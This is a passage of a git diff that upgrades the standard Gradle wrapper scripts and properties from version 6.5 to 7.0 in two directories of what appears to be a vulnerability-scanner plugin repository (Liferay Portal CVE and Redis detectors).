"Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/liferay_portal/cve20207961/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/liferay_portal/cve20207961/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/liferay_portal/cve20207961/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/liferay_portal/cve20207961/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/liferay_portal/cve20207961/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/liferay_portal/cve20207961/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/liferay_portal/cve20207961/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/liferay_portal/cve20207961/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/liferay_portal/cve20207961/gradlew b/google/detectors/rce/liferay_portal/cve20207961/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/liferay_portal/cve20207961/gradlew +++ b/google/detectors/rce/liferay_portal/cve20207961/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/liferay_portal/cve20207961/gradlew.bat b/google/detectors/rce/liferay_portal/cve20207961/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/liferay_portal/cve20207961/gradlew.bat +++ b/google/detectors/rce/liferay_portal/cve20207961/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/redis/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/redis/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/redis/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/redis/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/redis/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/redis/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/redis/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/redis/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/redis/gradlew b/google/detectors/rce/redis/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/redis/gradlew +++ b/google/detectors/rce/redis/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/redis/gradlew.bat b/google/detectors/rce/redis/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/redis/gradlew.bat +++ b/google/detectors/rce/redis/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" 